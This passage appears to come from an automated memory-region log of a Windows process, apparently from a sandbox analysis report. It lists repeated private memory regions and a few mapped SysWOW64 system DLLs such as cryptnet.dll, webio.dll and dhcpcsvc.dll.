start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2057 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2058 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2059 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2060 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2061 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2062 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2063 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2064 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2065 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2066 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2067 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2068 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2069 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2070 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2071 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2072 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2073 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2074 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2075 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2076 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2077 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2078 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2079 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2080 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2081 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2082 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2083 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2084 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2085 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2086 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2087 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2088 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2089 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2090 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2091 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2092 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2093 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2094 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2095 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2096 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2097 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2098 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2099 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2100 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2101 start_va = 0x3000000 end_va = 0x3002fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2102 start_va = 0x73e20000 end_va = 0x73e45fff entry_point = 0x73e20000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\SysWOW64\\cryptnet.dll" (normalized: "c:\\windows\\syswow64\\cryptnet.dll") Region: id = 2103 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2104 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2105 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2106 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2107 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2108 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2109 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2110 start_va = 0x77350000 end_va = 0x773a2fff entry_point = 0x77350000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2111 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2112 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2113 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2114 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2115 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2116 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2117 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2118 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2119 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2120 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2121 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2122 start_va = 0x3250000 end_va = 0x328ffff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 2123 start_va = 0x3c90000 end_va = 0x3d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 2124 start_va = 0x7f6e8000 end_va = 0x7f6eafff entry_point = 0x0 region_type = private name = "private_0x000000007f6e8000" filename = "" Region: id = 2125 start_va = 0x73e00000 end_va = 0x73e12fff entry_point = 0x73e00000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 2126 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2127 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2128 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2129 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2130 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2131 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2132 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2133 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2134 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2135 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2136 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2137 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2138 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2139 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2140 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2141 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2142 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2143 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2144 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2145 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2146 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2147 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2148 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2149 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2150 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2151 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2152 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2153 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2154 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2155 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2156 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2157 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2158 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2159 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2160 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2161 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2162 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2163 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2164 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2165 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2166 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2167 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2168 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2169 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2170 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2171 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2172 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2173 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2174 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2175 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2176 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2177 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2178 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2179 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2180 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2181 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2182 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2183 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2184 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2185 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2186 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2187 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2188 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2189 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2190 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2191 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2192 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2193 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2194 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2195 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2196 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2197 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2198 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2199 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2200 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2201 start_va = 0x73d70000 end_va = 0x73dd7fff entry_point = 0x73d70000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 2202 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2203 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2204 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2205 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2206 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2207 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2208 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2209 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2210 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2211 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2212 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2213 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2214 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2215 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2216 start_va = 0x2ea0000 end_va = 0x2ea4fff entry_point = 0x2ea0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 2217 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2218 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2219 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2220 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2221 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2222 start_va = 0x3040000 end_va = 0x304ffff entry_point = 0x3040000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 2223 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2224 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2225 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2226 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2227 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2228 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2229 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2230 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2231 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2232 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2233 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2234 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2235 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2236 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2237 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2238 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2239 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2240 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2241 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2242 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2243 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2244 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2245 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2246 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2247 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2248 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2249 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2250 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2251 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2252 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2253 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2254 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2255 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2256 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2257 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2258 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2259 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2260 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2261 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2262 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2263 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2264 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2265 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2266 start_va = 0x3d90000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 2267 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2268 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2269 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = 